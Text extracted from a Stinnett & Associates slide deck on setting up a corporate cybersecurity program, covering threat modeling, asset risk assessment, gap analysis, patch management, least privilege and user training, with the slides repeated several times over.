CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom